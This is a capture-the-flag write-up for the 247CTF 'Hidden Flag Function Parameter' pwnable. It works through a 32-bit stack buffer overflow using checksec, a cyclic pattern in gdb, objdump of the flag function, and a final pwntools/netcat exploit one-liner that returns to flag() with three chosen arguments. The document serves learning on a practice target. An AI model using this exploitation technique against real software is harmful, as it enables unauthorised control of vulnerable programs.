This is my write-up of the Pwnable challenge Hidden Flag Function Parameter on the CTF site 247CTF.com.
Can you control this application's flow to gain access to the hidden flag function with the correct parameters?
This one is very similar to Hidden Flag Function, but as we can see in the instructions, we also have to pass the right parameters to get the flag.
I found a lot of good stuff here.
kali@kali:~$ checksec hidden_flag_function_with_args
[*] '/home/kali/hidden_flag_function_with_args'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
We can see that we have a 32-bit little-endian binary with NX enabled. There is no stack canary and no PIE, so a stack buffer overflow can overwrite the saved return address with the fixed address of a function that already exists in the binary (NX only stops us from jumping into the input itself).
Let's create a unique, non-repeating pattern so that the crash address tells us exactly where the return address lies:
kali@kali:~$ msf-pattern_create -l 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9
Run the binary with gdb (I recommend installing gef) and paste the pattern obtained in the previous step as the input:
kali@kali:~$ gdb -q ./hidden_flag_function_with_args
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./hidden_flag_function_with_args...
(No debugging symbols found in ./hidden_flag_function_with_args)
gef➤ r
Starting program: /home/kali/hidden_flag_function_with_args
Sorry, no flag here!
You can ask for one though:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0x1
$ebx : 0x41346541 ("Ae4A"?)
$ecx : 0x0
$edx : 0xf7fb601c → 0x00000000
$esp : 0xffffd4c0 → "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"
$ebp : 0x65413565 ("e5Ae"?)
$esi : 0xf7fb4000 → 0x001d6d6c
$edi : 0xf7fb4000 → 0x001d6d6c
$eip : 0x37654136 ("6Ae7"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd4c0│+0x0000: "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]" ← $esp
0xffffd4c4│+0x0004: "e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5[...]"
0xffffd4c8│+0x0008: "0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A[...]"
0xffffd4cc│+0x000c: "Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag[...]"
0xffffd4d0│+0x0010: "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9[...]"
0xffffd4d4│+0x0014: "4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0A[...]"
0xffffd4d8│+0x0018: "Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah[...]"
0xffffd4dc│+0x001c: "f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x37654136
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hidden_flag_fun", stopped 0x37654136 in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
The program crashes at 0x37654136 (EIP now holds the pattern bytes "6Ae7"), so we use msf-pattern_offset to calculate the offset:
kali@kali:~$ msf-pattern_offset -q 0x37654136
[*] Exact match at offset 140
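To see why the crash address maps to offset 140, here is an added example (not part of the original write-up) that reimplements the scheme behind msf-pattern_create and msf-pattern_offset: upper/lower/digit triples with the digit cycling fastest, then a little-endian search for the faulting EIP. The length of 300 and the EIP value are the ones from the session above.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length):
    """Build the cyclic pattern "Aa0Aa1...Aa9Ab0..." of the given length.

    Every 3-byte triple is unique, so any 4 consecutive bytes identify
    one position in the buffer (constructed to mirror msf-pattern_create).
    """
    out = []
    for up in ascii_uppercase:
        for low in ascii_lowercase:
            for dig in digits:
                out.append(up + low + dig)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    raise ValueError("requested length exceeds the 26*26*10*3 byte pattern")


def pattern_offset(eip, length=300):
    """Return the offset of the 4 pattern bytes that landed in EIP, or -1.

    EIP is little-endian, so 0x37654136 corresponds to the bytes "6Ae7".
    A -1 means EIP did not come from our pattern (e.g. a real code address),
    which tells us the return address was not the thing we overwrote.
    """
    needle = struct.pack("<I", eip)
    return pattern_create(length).encode("ascii").find(needle)


if __name__ == "__main__":
    # Values from the gdb session above: SIGSEGV with EIP = 0x37654136
    print(pattern_offset(0x37654136))   # 140, matching msf-pattern_offset
    print(pattern_offset(0x08048576))   # -1: that is flag(), not pattern data
```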
Now let's check the objdump of the binary. We are searching for cmp instructions, as we know that some parameter conditions have to be met:
kali@kali:~$ objdump -drwC -Mintel -d hidden_flag_function_with_args
...
08048576 <flag>:
8048576: 55 push ebp
8048577: 89 e5 mov ebp,esp
8048579: 53 push ebx
804857a: 81 ec 94 00 00 00 sub esp,0x94
8048580: e8 2b ff ff ff call 80484b0 <__x86.get_pc_thunk.bx>
8048585: 81 c3 7b 1a 00 00 add ebx,0x1a7b
804858b: 81 7d 08 37 13 00 00 cmp DWORD PTR [ebp+0x8],0x1337
8048592: 75 63 jne 80485f7 <flag+0x81>
8048594: 81 7d 0c 47 02 00 00 cmp DWORD PTR [ebp+0xc],0x247
804859b: 75 5a jne 80485f7 <flag+0x81>
804859d: 81 7d 10 78 56 34 12 cmp DWORD PTR [ebp+0x10],0x12345678
80485a4: 75 51 jne 80485f7 <flag+0x81>
...
So the three parameters need to be 0x1337, 0x247 and 0x12345678. Since this is a 32-bit cdecl binary, flag reads them from the stack at [ebp+0x8], [ebp+0xc] and [ebp+0x10]: after the overwritten return address sends execution to flag, the next 4 bytes become the return address flag itself will see, and the three values follow it in order.
kali@kali:~$ python -c "from pwn import *; print 'a' * 140 + p32(0x08048576) + 'P' * 4 + p32(0x1337) + p32(0x247) + p32(0x12345678)" | nc a1b6b58043ec4527.247ctf.com 50284
Sorry, no flag here!
You can ask for one though:
How did you get here?
Have a flag!
247CTF{xxxx}